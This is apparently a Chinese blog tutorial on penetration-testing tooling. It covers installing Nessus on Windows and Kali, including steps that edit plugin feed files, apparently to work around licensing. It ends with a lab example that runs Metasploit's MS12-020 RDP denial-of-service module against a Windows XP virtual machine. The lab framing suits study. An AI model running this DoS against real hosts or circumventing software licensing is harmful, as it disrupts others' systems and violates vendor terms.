Web渗透测试实战——(2

三、Metasploit各生命周期中使用的组件与模块

四、Metasploit 辅助工具

1. Nessus

最流行的漏洞评估工具之一。它属于漏洞扫描程序类别。一旦Nessus告诉我们目标系统上存在哪些漏洞,我们就可以将这些漏洞提供给Metasploit,看看它们是否可以被真正利用。

2. 安装

Windows

  1. https://www.tenable.com/products/nessus/
  2. 选择合适版本(32-bit/64-bit)
  3. 下载并安装msi文件
  4. Open a browser and navigate to the URL :https://localhost:8834/
  5. 设置新username和password以访问Nessus控制台
  6. 申请注册, 点击 registering this scanner
  7. 访问http://www.tenable.com/products/nessus/nessus-plugins/获取激活码,选择 Nessus Home 输入注册详尽信息
  8. 输入通过电子邮件收到的注册码

Linux(详细)

  1. https://www.tenable.com/downloads/nessus?loginAttempted=true
  2. 以 kali linux (Debian 64位)为例
  3. 拖动文件,复制到kali linux 中
  4. dpkg -i Nessus-8.15.3-debian6_amd64.deb
  5. service nessusd start
  6. service nessusd status
  7. 访问 https://localhost:8834/
  8. 选择Managed Scanner,然后选择继续
  9. 选择Tenable.sc
  10. 设置username和password ,之后等待安装
  11. 注册邮箱 ,获取激活码
  12. 控制台进入 Nessus文件:
cd /opt/nessus/sbin/
./nessuscli fetch --challenge 获取challenge code

13.访问:https://plugins.nessus.org/v2/offline.php 输入challenge code 和激活码,下载

all.-2.x.tar.gz

14.将all.-2.x.tar.gz拖动至/opt/nessus/sbin下:

    1: cp all-2.0.tar.gz /opt/nessus/sbin/
    2: cd /opt/nessus/sbin/
    3: ./nessuscli update all-2.0.tar.gz
    4:  cp -r /opt/nessus/lib/nessus/plugins/ /opt/nessus/lib/nessus/plugins.bak/
    5:  service nessusd restart

15.后续操作修改plugin_feed_info.inc文件:

    1: vim /opt/nessus/var/nessus/plugin_feed_info.inc
    2: vim /opt/nessus/lib/nessus/plugins/plugin_feed_info.inc
    3: service nessusd restart
    4: cd /opt/nessus/lib/nessus
    5: rm -rf plugins
    6: mv plugins.bak/ plugins
    7: 重启kali
    8: service nessusd start
    9: 重新访问 https://localhost:8834/ 等待更新

3. kali自带 Namp

4. kali 自带Metasploit

kali安装 (虚拟机)

https://www.kali.org/get-kali/#kali-virtual-machines
安装完成后:

1.控制台输入 msfconsole

2.msf命令教程:https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/

实例教程(仅供教学测试)

虚拟机:Windows XP(远程执行代码)https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-020

1.msf6> search ms12-020

2.use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

 3.查看并设置参数(本地局域网测试)

   show options

set RHOST 192.168.116.35
RHOST => 192.168.116.129

4.run

五、整理的帮助文档

官方文档:https://www.offensive-security.com/metasploit-unleashed/

Metasploit社区:http://resources.metasploit.com/

Metasploit指南:https://metasploit.help.rapid7.com/docs

笔者因才疏学浅初次尝试,尚有许多不足,望多加指正!
该期下一分节:渗透测试实战——(2.2)使用Metasploit进行Web渗透

🍻支持一下

觉得我写的好的话可以支持一下我哦~持续关注我,会更新其他好玩且实用的项目。

网络安全学习路线

这是一份网络安全从零基础到进阶的学习路线大纲全览,小伙伴们记得点个收藏!

1.学习路线脑图

高清的可自行下载

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值